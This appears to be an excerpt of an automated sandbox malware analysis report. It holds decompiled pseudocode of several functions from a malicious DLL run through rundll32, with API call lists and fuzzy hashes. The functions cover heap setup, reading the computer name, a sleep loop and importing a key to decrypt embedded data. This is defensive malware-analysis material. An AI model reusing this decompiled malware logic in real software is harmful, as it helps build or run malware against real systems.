                    • Associated: 00000006.00000002.811440190.0000000004210000.00000004.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811472949.0000000004219000.00000002.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811484936.000000000421A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811499542.000000000421C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_4210000_rundll32.jbxd
                    Similarity
                    • API ID: Trim
                    • String ID:
                    • API String ID: 3043112668-0
                    • Opcode ID: b71f49405635a36140a71bf6097f875b5fe8d528e4275cf839839af7fd27c99b
                    • Instruction ID: 12517c329367d6c957f26faa4c333a789e12c0bc70549386b20b8cf35091e70d
                    • Opcode Fuzzy Hash: b71f49405635a36140a71bf6097f875b5fe8d528e4275cf839839af7fd27c99b
                    • Instruction Fuzzy Hash: 9A0171723203466FF7109E2A9C49F677BDEEBE9794F044021ED55CB2A1E970E942C660
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0421607D Relevance: 3.8, APIs: 3, Instructions: 81COMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E0421607D(void* _a4, intOrPtr _a8, intOrPtr _a12) {
				int _v12;
				signed int _v16;
				void* _v20;
				signed char _v36;
				void* _t24;
				intOrPtr _t27;
				void* _t35;
				signed char* _t46;
				int _t53;
				void* _t55;
				void* _t56;
				void* _t57;

				_v16 = _v16 & 0x00000000;
				_t46 = _a4;
				_t53 = ( *_t46 & 0x000000ff) + 0x110;
				_v12 = 0x110;
				_t24 = E042163FD(_t53);
				_a4 = _t24;
				if(_t24 != 0) {
					memcpy(_t24,  *0x421a374, 0x110);
					_t27 =  *0x421a378; // 0x0
					_t57 = _t56 + 0xc;
					if(_t27 != 0) {
						_t51 = _a4;
						E042143A6(0x110, _a4, _t27, 0);
					}
					if(E04215B65( &_v36) != 0) {
						_t35 = E04214872(0x110, 0,  &_v36, _a4,  &_v20,  &_v12); // executed
						if(_t35 == 0) {
							_t55 = _v20;
							_v36 =  *_t46;
							_v16 = E04216412(_t55, _a8, _t51, _t46, _a12);
							 *(_t55 + 4) = _v36;
							_t20 =  &(_t46[4]); // 0xbf0845c7
							memset(_t55, 0, _v12 - ( *_t20 & 0xf));
							_t57 = _t57 + 0xc;
							E042117AB(_t55);
						}
					}
					memset(_a4, 0, _t53);
					E042117AB(_a4);
				}
				return _v16;
			}















                    0x04216083
                    0x04216088
                    0x04216095
                    0x04216098
                    0x0421609b
                    0x042160a2
                    0x042160a5
                    0x042160b3
                    0x042160b8
                    0x042160bd
                    0x042160c2
                    0x042160c4
                    0x042160cc
                    0x042160cc
                    0x042160db
                    0x042160f0
                    0x042160f7
                    0x042160fe
                    0x04216104
                    0x04216112
                    0x04216118
                    0x0421611b
                    0x04216128
                    0x0421612d
                    0x04216131
                    0x04216131
                    0x042160f7
                    0x0421613c
                    0x04216147
                    0x04216147
                    0x04216153

                    APIs
                      • Part of subcall function 042163FD: RtlAllocateHeap.NTDLL(00000000,00000000,042128D5), ref: 04216409
                    • memcpy.NTDLL(00000000,00000110,?,?,?,?,04214DD9,?,04213AC6,04213AC6,?), ref: 042160B3
                    • memset.NTDLL ref: 04216128
                    • memset.NTDLL ref: 0421613C
                    Memory Dump Source
                    • Source File: 00000006.00000002.811456478.0000000004211000.00000020.00020000.sdmp, Offset: 04210000, based on PE: true
                    • Associated: 00000006.00000002.811440190.0000000004210000.00000004.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811472949.0000000004219000.00000002.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811484936.000000000421A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811499542.000000000421C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_4210000_rundll32.jbxd
                    Similarity
                    • API ID: memset$AllocateHeapmemcpy
                    • String ID:
                    • API String ID: 1529149438-0
                    • Opcode ID: baff9c27c146b1d785509e1ecd79425b77034abdc862cd0fffc5876b0bbf6bd9
                    • Instruction ID: 2ef289f42f21f1f7c88966a285e96627d65472d5f42b2a16f8aaf911988d9c4e
                    • Opcode Fuzzy Hash: baff9c27c146b1d785509e1ecd79425b77034abdc862cd0fffc5876b0bbf6bd9
                    • Instruction Fuzzy Hash: FE213D75B10128ABEF11EF65DC40FAEBBF8AF58644F044065F905E7261D734EA518BA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 04215F80 Relevance: 3.1, APIs: 2, Instructions: 112COMMON
                    Download Yara Rule
                    C-Code - Quality: 75%
                    			E04215F80(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
				void* _v8;
				void* __esi;
				intOrPtr* _t35;
				void* _t40;
				intOrPtr* _t41;
				intOrPtr* _t43;
				intOrPtr* _t45;
				intOrPtr* _t50;
				intOrPtr* _t52;
				void* _t54;
				intOrPtr* _t55;
				intOrPtr* _t57;
				intOrPtr* _t61;
				intOrPtr* _t65;
				intOrPtr _t68;
				void* _t72;
				void* _t75;
				void* _t76;

				_t55 = _a4;
				_t35 =  *((intOrPtr*)(_t55 + 4));
				_a4 = 0;
				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
				if(_t76 < 0) {
					L18:
					return _t76;
				}
				_t40 = E042114E4(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
				_t76 = _t40;
				if(_t76 >= 0) {
					_t61 = _a28;
					if(_t61 != 0 &&  *_t61 != 0) {
						_t52 = _v8;
						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
					}
					if(_t76 >= 0) {
						_t43 =  *_t55;
						_t68 =  *0x421a320; // 0x87d5a8
						_t20 = _t68 + 0x421b1fc; // 0x740053
						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
						if(_t76 >= 0) {
							_t76 = E042163B0(_a4);
							if(_t76 >= 0) {
								_t65 = _a28;
								if(_t65 != 0 &&  *_t65 == 0) {
									_t50 = _a4;
									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
								}
							}
						}
						_t45 = _a4;
						if(_t45 != 0) {
							 *((intOrPtr*)( *_t45 + 8))(_t45);
						}
						_t57 = __imp__#6;
						if(_a20 != 0) {
							 *_t57(_a20);
						}
						if(_a12 != 0) {
							 *_t57(_a12);
						}
					}
				}
				_t41 = _v8;
				 *((intOrPtr*)( *_t41 + 8))(_t41);
				goto L18;
			}





















                    0x04215f86
                    0x04215f89
                    0x04215f99
                    0x04215fa2
                    0x04215fa6
                    0x04216074
                    0x0421607a
                    0x0421607a
                    0x04215fc0
                    0x04215fc5
                    0x04215fc9
                    0x04215fcf
                    0x04215fd4
                    0x04215fdb
                    0x04215fea
                    0x04215fea
                    0x04215fee
                    0x04215ff0
                    0x04215ffc
                    0x04216007
                    0x04216012
                    0x04216016
                    0x04216020
                    0x04216024
                    0x04216026
                    0x0421602b
                    0x04216032
                    0x04216042
                    0x04216042
                    0x0421602b
                    0x04216024
                    0x04216044
                    0x04216049
                    0x0421604e
                    0x0421604e
                    0x04216054
                    0x0421605a
                    0x0421605f
                    0x0421605f
                    0x04216064
                    0x04216069
                    0x04216069
                    0x04216064
                    0x04215fee
                    0x0421606b
                    0x04216071
                    0x00000000

                    APIs
                      • Part of subcall function 042114E4: SysAllocString.OLEAUT32(80000002), ref: 0421153B
                      • Part of subcall function 042114E4: SysFreeString.OLEAUT32(00000000), ref: 042115A0
                    • SysFreeString.OLEAUT32(?), ref: 0421605F
                    • SysFreeString.OLEAUT32(04212BCC), ref: 04216069
                    Memory Dump Source
                    • Source File: 00000006.00000002.811456478.0000000004211000.00000020.00020000.sdmp, Offset: 04210000, based on PE: true
                    • Associated: 00000006.00000002.811440190.0000000004210000.00000004.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811472949.0000000004219000.00000002.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811484936.000000000421A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811499542.000000000421C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_4210000_rundll32.jbxd
                    Similarity
                    • API ID: String$Free$Alloc
                    • String ID:
                    • API String ID: 986138563-0
                    • Opcode ID: 4f947bb13e89e9cba356307a266d220631b8a3c1834ede00f5138fca1431b9d6
                    • Instruction ID: ec823654e061f99e0d73517ca4beadf18685d68096ab1a0cc3860610580a8f33
                    • Opcode Fuzzy Hash: 4f947bb13e89e9cba356307a266d220631b8a3c1834ede00f5138fca1431b9d6
                    • Instruction Fuzzy Hash: EA311772600159EFCB21DF58C888C9FBBB9FBD97407154658F9059B220D732ED91CBA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0421281B Relevance: 3.0, APIs: 2, Instructions: 42memoryCOMMON
                    Download Yara Rule
                    APIs
                    • SysAllocString.OLEAUT32(04215F20), ref: 04212835
                      • Part of subcall function 04215F80: SysFreeString.OLEAUT32(?), ref: 0421605F
                    • SysFreeString.OLEAUT32(00000000), ref: 04212875
                    Memory Dump Source
                    • Source File: 00000006.00000002.811456478.0000000004211000.00000020.00020000.sdmp, Offset: 04210000, based on PE: true
                    • Associated: 00000006.00000002.811440190.0000000004210000.00000004.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811472949.0000000004219000.00000002.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811484936.000000000421A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811499542.000000000421C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_4210000_rundll32.jbxd
                    Similarity
                    • API ID: String$Free$Alloc
                    • String ID:
                    • API String ID: 986138563-0
                    • Opcode ID: 744704fcfa03100e30b61bbad47e109fe42d511482da35daa80eae36d0d35e50
                    • Instruction ID: 08a8580679bc80d3fd4185ab188a705027d2c5e35824d163c83cfbc4c4092595
                    • Opcode Fuzzy Hash: 744704fcfa03100e30b61bbad47e109fe42d511482da35daa80eae36d0d35e50
                    • Instruction Fuzzy Hash: 0E014F7261010ABFDB119F58D80899FBBB9EF58350B414061F905A6130D775AD15CBA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 04212985 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 42memoryCOMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E04212985(intOrPtr* __edi, void* _a4, intOrPtr _a8, unsigned int _a12) {
				void* _t24;
				signed short _t25;
				signed int _t27;
				intOrPtr* _t28;
				signed short _t29;

				_t28 = __edi;
				if(_a4 == 0) {
					L2:
					_t29 = E04211BC5(_a4, 0x80000002, _a8, _a12,  &_a4,  &_a12);
					if(_t29 == 0) {
						_t27 = _a12 >> 1;
						if(_t27 == 0) {
							_t29 = 2;
							HeapFree( *0x421a2d8, 0, _a4);
						} else {
							_t24 = _a4;
							 *(_t24 + _t27 * 2 - 2) =  *(_t24 + _t27 * 2 - 2) & _t29;
							 *_t28 = _t24;
						}
					}
					L6:
					return _t29;
				}
				_t25 = E04213CEA(_a4, _a8, _a12, __edi); // executed
				_t29 = _t25;
				if(_t29 == 0) {
					goto L6;
				}
				goto L2;
			}








                    0x04212985
                    0x0421298d
                    0x042129a4
                    0x042129bf
                    0x042129c3
                    0x042129c8
                    0x042129ca
                    0x042129da
                    0x042129e6
                    0x042129cc
                    0x042129cc
                    0x042129cf
                    0x042129d4
                    0x042129d4
                    0x042129ca
                    0x042129ec
                    0x042129f0
                    0x042129f0
                    0x04212999
                    0x0421299e
                    0x042129a2
                    0x00000000
                    0x00000000
                    0x00000000

                    APIs
                      • Part of subcall function 04213CEA: SysFreeString.OLEAUT32(00000000), ref: 04213D50
                    • HeapFree.KERNEL32(00000000,00000000,00000000,80000002,74E5F710,?,00000000,?,00000000,?,042133D6,?,004F0053,04A993D8,00000000,?), ref: 042129E6
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.811456478.0000000004211000.00000020.00020000.sdmp, Offset: 04210000, based on PE: true
                    • Associated: 00000006.00000002.811440190.0000000004210000.00000004.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811472949.0000000004219000.00000002.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811484936.000000000421A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811499542.000000000421C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_4210000_rundll32.jbxd
                    Similarity
                    • API ID: Free$HeapString
                    • String ID: Ut
                    • API String ID: 3806048269-8415677
                    • Opcode ID: 9f5925ec8236e351e8cf7301c7f9326b92aeb1ae4c33095cb3b8eaa6f7df554c
                    • Instruction ID: 5f1f0631f0fc979b6b2aa4b0ec235a77a50aa6b4c478d0cee696ef6bb151cccd
                    • Opcode Fuzzy Hash: 9f5925ec8236e351e8cf7301c7f9326b92aeb1ae4c33095cb3b8eaa6f7df554c
                    • Instruction Fuzzy Hash: 7401FF3221125AFBDB229F48DC05FEA7BA9FF14790F148055FE056A130D771E960DB94
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0421256F Relevance: 3.0, APIs: 2, Instructions: 40COMMON
                    Download Yara Rule
                    C-Code - Quality: 37%
                    			E0421256F(void* __ecx) {
				signed int _v8;
				void* _t15;
				void* _t19;
				void* _t20;
				void* _t22;
				intOrPtr* _t23;

				_t23 = __imp__;
				_t20 = 0;
				_v8 = _v8 & 0;
				 *_t23(3, 0,  &_v8, _t19, _t22, __ecx); // executed
				_t10 = _v8;
				if(_v8 != 0) {
					_t20 = E042163FD(_t10 + 1);
					if(_t20 != 0) {
						_t15 =  *_t23(3, _t20,  &_v8); // executed
						if(_t15 != 0) {
							 *((char*)(_v8 + _t20)) = 0;
						} else {
							E042117AB(_t20);
							_t20 = 0;
						}
					}
				}
				return _t20;
			}









                    0x04212574
                    0x0421257f
                    0x04212581
                    0x04212587
                    0x04212589
                    0x0421258e
                    0x04212597
                    0x0421259b
                    0x042125a4
                    0x042125a8
                    0x042125b7
                    0x042125aa
                    0x042125ab
                    0x042125b0
                    0x042125b0
                    0x042125a8
                    0x0421259b
                    0x042125c0

                    APIs
                    • GetComputerNameExA.KERNEL32(00000003,00000000,?,?,00000000,?,?,04216999), ref: 04212587
                      • Part of subcall function 042163FD: RtlAllocateHeap.NTDLL(00000000,00000000,042128D5), ref: 04216409
                    • GetComputerNameExA.KERNEL32(00000003,00000000,?,?,?,?,04216999), ref: 042125A4
                      • Part of subcall function 042117AB: HeapFree.KERNEL32(00000000,00000000,04212976,00000000,?,?,00000000), ref: 042117B7
                    Memory Dump Source
                    • Source File: 00000006.00000002.811456478.0000000004211000.00000020.00020000.sdmp, Offset: 04210000, based on PE: true
                    • Associated: 00000006.00000002.811440190.0000000004210000.00000004.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811472949.0000000004219000.00000002.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811484936.000000000421A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811499542.000000000421C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_4210000_rundll32.jbxd
                    Similarity
                    • API ID: ComputerHeapName$AllocateFree
                    • String ID:
                    • API String ID: 187446995-0
                    • Opcode ID: 3eb9d129c1bb9b9e6880e82d9a7e591d29c51944b5751d7c0f86b3d81778cab2
                    • Instruction ID: d0b2881acad95648f4697fd747cb76bfcee38e967d5b4b525acf9e75abcbea5a
                    • Opcode Fuzzy Hash: 3eb9d129c1bb9b9e6880e82d9a7e591d29c51944b5751d7c0f86b3d81778cab2
                    • Instruction Fuzzy Hash: 6AF0B47271010AFAE730D6998C54EAF76FDDBD4650F1000A5F905E3150EAB0EF028670
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 042145D2 Relevance: 3.0, APIs: 2, Instructions: 24memoryCOMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E042145D2(signed int __edx, intOrPtr _a4) {
				void* _t3;
				void* _t5;
				void* _t8;
				void* _t9;
				void* _t10;
				signed int _t11;

				_t11 = __edx;
				_t3 = HeapCreate(0, 0x400000, 0); // executed
				 *0x421a2d8 = _t3;
				if(_t3 == 0) {
					_t9 = 8;
					return _t9;
				}
				 *0x421a1c8 = GetTickCount();
				_t5 = E04215A5A(_a4);
				if(_t5 == 0) {
					E04212A4C(_t10, _a4); // executed
					if(E04214C43(_t10) != 0) {
						 *0x421a300 = 1; // executed
					}
					_t8 = E04216535(_t11); // executed
					return _t8;
				}
				return _t5;
			}









                    0x042145d2
                    0x042145db
                    0x042145e3
                    0x042145e8
                    0x042145ec
                    0x00000000
                    0x042145ec
                    0x042145f9
                    0x042145fe
                    0x04214605
                    0x0421460b
                    0x04214617
                    0x04214619
                    0x04214619
                    0x04214623
                    0x00000000
                    0x04214623
                    0x04214628

                    APIs
                    • HeapCreate.KERNEL32(00000000,00400000,00000000,0421108E,?), ref: 042145DB
                    • GetTickCount.KERNEL32 ref: 042145EF
                    Memory Dump Source
                    • Source File: 00000006.00000002.811456478.0000000004211000.00000020.00020000.sdmp, Offset: 04210000, based on PE: true
                    • Associated: 00000006.00000002.811440190.0000000004210000.00000004.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811472949.0000000004219000.00000002.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811484936.000000000421A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811499542.000000000421C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_4210000_rundll32.jbxd
                    Similarity
                    • API ID: CountCreateHeapTick
                    • String ID:
                    • API String ID: 2177101570-0
                    • Opcode ID: 50c141fd817cb39fc67ec2b703d68433d0ead63bf1ba9780c4173dda290ba65a
                    • Instruction ID: 54e760b87cf6dd6a9a44435c511589285b15c673c78dc1f96f1ac4efe222208b
                    • Opcode Fuzzy Hash: 50c141fd817cb39fc67ec2b703d68433d0ead63bf1ba9780c4173dda290ba65a
                    • Instruction Fuzzy Hash: B4E09270761341BAE7207F74BD49B0975E4EB70B4AF104025F90DD10B4DFB9E840AE21
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 04213CEA Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                    Download Yara Rule
                    C-Code - Quality: 34%
                    			E04213CEA(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v12;
				void* _v18;
				short _v20;
				intOrPtr _t15;
				short _t17;
				intOrPtr _t19;
				short _t23;

				_t23 = 0;
				_v20 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_t15 =  *0x421a320; // 0x87d5a8
				_t4 = _t15 + 0x421b39c; // 0x4a98944
				_t20 = _t4;
				_t6 = _t15 + 0x421b124; // 0x650047
				_t17 = E04215F80(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
				if(_t17 < 0) {
					_t23 = _t17;
				} else {
					if(_v20 != 8) {
						_t23 = 1;
					} else {
						_t19 = E04212E8A(_t20, _v12);
						if(_t19 == 0) {
							_t23 = 8;
						} else {
							 *_a16 = _t19;
						}
						__imp__#6(_v12);
					}
				}
				return _t23;
			}










                    0x04213cf4
                    0x04213cf6
                    0x04213cfd
                    0x04213cfe
                    0x04213cff
                    0x04213d00
                    0x04213d06
                    0x04213d0b
                    0x04213d0b
                    0x04213d15
                    0x04213d27
                    0x04213d2e
                    0x04213d5d
                    0x04213d30
                    0x04213d35
                    0x04213d5a
                    0x04213d37
                    0x04213d3a
                    0x04213d41
                    0x04213d4c
                    0x04213d43
                    0x04213d46
                    0x04213d46
                    0x04213d50
                    0x04213d50
                    0x04213d35
                    0x04213d64

                    APIs
                      • Part of subcall function 04215F80: SysFreeString.OLEAUT32(?), ref: 0421605F
                      • Part of subcall function 04212E8A: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,042125F5,004F0053,00000000,?), ref: 04212E93
                      • Part of subcall function 04212E8A: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,042125F5,004F0053,00000000,?), ref: 04212EBD
                      • Part of subcall function 04212E8A: memset.NTDLL ref: 04212ED1
                    • SysFreeString.OLEAUT32(00000000), ref: 04213D50
                    Memory Dump Source
                    • Source File: 00000006.00000002.811456478.0000000004211000.00000020.00020000.sdmp, Offset: 04210000, based on PE: true
                    • Associated: 00000006.00000002.811440190.0000000004210000.00000004.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811472949.0000000004219000.00000002.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811484936.000000000421A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811499542.000000000421C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_4210000_rundll32.jbxd
                    Similarity
                    • API ID: FreeString$lstrlenmemcpymemset
                    • String ID:
                    • API String ID: 397948122-0
                    • Opcode ID: 055548b718b9346e783a860a17fc604b1cc24cf5ff800ea41b0df08ab73d77bb
                    • Instruction ID: f54c20513249333b4911e0e299f24f078452c918467fe63fd57043fb2f185b47
                    • Opcode Fuzzy Hash: 055548b718b9346e783a860a17fc604b1cc24cf5ff800ea41b0df08ab73d77bb
                    • Instruction Fuzzy Hash: 37018032720019BBEB11DF98CC049AEBBFAFB14B50F004461E905E6030D3B1A955CB91
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 04217885 Relevance: 1.3, APIs: 1, Instructions: 36stringCOMMON
                    Download Yara Rule
                    C-Code - Quality: 75%
                    			E04217885(void* __ecx, void* __edx, void* _a4, void* _a8) {
				void* _t13;
				void* _t21;

				_t11 =  &_a4;
				_t21 = 0;
				__imp__( &_a8);
				_t13 = E04214872( &_a4 + 1, 1, _a8, _a4, _a4, _t11); // executed
				if(_t13 == 0) {
					_t21 = E042163FD(_a8 + _a8);
					if(_t21 != 0) {
						E0421213D(_a4, _t21, _t23);
					}
					E042117AB(_a4);
				}
				return _t21;
			}





                    0x0421788d
                    0x04217894
                    0x04217896
                    0x042178a5
                    0x042178ac
                    0x042178bb
                    0x042178bf
                    0x042178c6
                    0x042178c6
                    0x042178ce
                    0x042178d3
                    0x042178d8

                    APIs
                    • lstrlen.KERNEL32(?,?,?,00000000,?,0421191E,00000000,?,?,?,04216ABB,?,04A995B0), ref: 04217896
                      • Part of subcall function 04214872: CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000018,F0000000,?,00000110,04213AC6), ref: 042148AA
                      • Part of subcall function 04214872: memcpy.NTDLL(?,04213AC6,00000010,?,?,?,?,?,?,?,?,?,?,042160F5,00000000,04214DD9), ref: 042148C3
                      • Part of subcall function 04214872: CryptImportKey.ADVAPI32(00000000,?,0000001C,00000000,00000000,?), ref: 042148EC
                      • Part of subcall function 04214872: CryptSetKeyParam.ADVAPI32(?,00000001,?,00000000), ref: 04214904
                      • Part of subcall function 04214872: memcpy.NTDLL(00000000,04214DD9,04213AC6,0000011F), ref: 04214956
                      • Part of subcall function 042163FD: RtlAllocateHeap.NTDLL(00000000,00000000,042128D5), ref: 04216409
                    Memory Dump Source
                    • Source File: 00000006.00000002.811456478.0000000004211000.00000020.00020000.sdmp, Offset: 04210000, based on PE: true
                    • Associated: 00000006.00000002.811440190.0000000004210000.00000004.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811472949.0000000004219000.00000002.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811484936.000000000421A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811499542.000000000421C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_4210000_rundll32.jbxd
                    Similarity
                    • API ID: Crypt$memcpy$AcquireAllocateContextHeapImportParamlstrlen
                    • String ID:
                    • API String ID: 894908221-0
                    • Opcode ID: 0375958fbb515978b5d43e1cf5bd04b3b63177f9a90a420d0cfc0573471f75f7
                    • Instruction ID: c1dc2ee9d4a471f0c47a610d375d27f9cace377a445d2e9079fe92bd7efb13f4
                    • Opcode Fuzzy Hash: 0375958fbb515978b5d43e1cf5bd04b3b63177f9a90a420d0cfc0573471f75f7
                    • Instruction Fuzzy Hash: 09F03076210109BADF01AE59DC04CEF3BADEFD5764B018021FD189A120DB31E555D7A0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 042156CF Relevance: 1.3, APIs: 1, Instructions: 36sleepCOMMON
                    Download Yara Rule
                    C-Code - Quality: 88%
                    			E042156CF(intOrPtr* __edi) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				intOrPtr _t15;
				intOrPtr* _t21;

				_t21 = __edi;
				_push( &_v12);
				_push(__edi);
				_v8 = 0x1d4c0;
				_t15 =  *((intOrPtr*)( *__edi + 0xe0))();
				while(1) {
					_v16 = _t15;
					Sleep(0x1f4); // executed
					if(_v12 == 4) {
						break;
					}
					if(_v8 == 0) {
						L4:
						_t15 =  *((intOrPtr*)( *_t21 + 0xe0))(_t21,  &_v12);
						continue;
					} else {
						if(_v8 <= 0x1f4) {
							_v16 = 0x80004004;
						} else {
							_v8 = _v8 - 0x1f4;
							goto L4;
						}
					}
					L8:
					return _v16;
				}
				goto L8;
			}








                    0x042156cf
                    0x042156dc
                    0x042156dd
                    0x042156de
                    0x042156e5
                    0x04215713
                    0x04215714
                    0x04215717
                    0x0421571d
                    0x00000000
                    0x00000000
                    0x042156fc
                    0x04215706
                    0x0421570d
                    0x00000000
                    0x042156fe
                    0x04215701
                    0x04215721
                    0x04215703
                    0x04215703
                    0x00000000
                    0x04215703
                    0x04215701
                    0x04215728
                    0x0421572e
                    0x0421572e
                    0x00000000

                    APIs
                    Memory Dump Source
                    • Source File: 00000006.00000002.811456478.0000000004211000.00000020.00020000.sdmp, Offset: 04210000, based on PE: true
                    • Associated: 00000006.00000002.811440190.0000000004210000.00000004.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811472949.0000000004219000.00000002.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811484936.000000000421A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811499542.000000000421C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_4210000_rundll32.jbxd
                    Similarity
                    • API ID: Sleep
                    • String ID:
                    • API String ID: 3472027048-0
                    • Opcode ID: c48dd64712cb587a6cf28ab8b028434230f90fd0e9fa1f88464bcf94e609ef44
                    • Instruction ID: f61aad7b0a72cd5175d0c4a3cd9d4c843cdc6846832fb47abfa6a53fcc3770eb
                    • Opcode Fuzzy Hash: c48dd64712cb587a6cf28ab8b028434230f90fd0e9fa1f88464bcf94e609ef44
                    • Instruction Fuzzy Hash: C4F01475E21219FFCB00DB98D489AEDB7F8FF55244F1080EAE502A3210E3B46A81CB65
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 042134EE Relevance: 1.3, APIs: 1, Instructions: 26stringCOMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E042134EE(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, WCHAR* _a20) {
				void* _t17;

				if(_a4 == 0) {
					L2:
					return E042134AC(_a8, 1, _a12, _a16, _a20, lstrlenW(_a20) + _t14 + 2);
				}
				_t17 = E0421281B(_a4, _a8, _a12, _a16, _a20); // executed
				if(_t17 != 0) {
					goto L2;
				}
				return _t17;
			}




                    0x042134f6
                    0x04213510
                    0x00000000
                    0x0421352c
                    0x04213507
                    0x0421350e
                    0x00000000
                    0x00000000
                    0x04213533

                    APIs
                    • lstrlenW.KERNEL32(?,?,?,04212CE7,3D042190,80000002,04211850,04215F20,74666F53,4D4C4B48,04215F20,?,3D042190,80000002,04211850,?), ref: 04213513
                      • Part of subcall function 0421281B: SysAllocString.OLEAUT32(04215F20), ref: 04212835
                      • Part of subcall function 0421281B: SysFreeString.OLEAUT32(00000000), ref: 04212875
                    Memory Dump Source
                    • Source File: 00000006.00000002.811456478.0000000004211000.00000020.00020000.sdmp, Offset: 04210000, based on PE: true
                    • Associated: 00000006.00000002.811440190.0000000004210000.00000004.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811472949.0000000004219000.00000002.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811484936.000000000421A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811499542.000000000421C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_4210000_rundll32.jbxd
                    Similarity
                    • API ID: String$AllocFreelstrlen
                    • String ID:
                    • API String ID: 3808004451-0
                    • Opcode ID: 363984a1adc73a2757fd26d7b837a964770e8dde85d45b906d6c0e2b39b5dc4f
                    • Instruction ID: d66c86d03a455af05761020e997b864426c8c0f8f168980cae267839bd71b2c2
                    • Opcode Fuzzy Hash: 363984a1adc73a2757fd26d7b837a964770e8dde85d45b906d6c0e2b39b5dc4f
                    • Instruction Fuzzy Hash: E6F0923211010EBFEF029F90EC45E9A3FAAEB28794F048014FE0555071D732EAB1EBA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 04214DC8 Relevance: 1.3, APIs: 1, Instructions: 23COMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E04214DC8(void* __edi, void* _a4) {
				int _t7;
				int _t12;

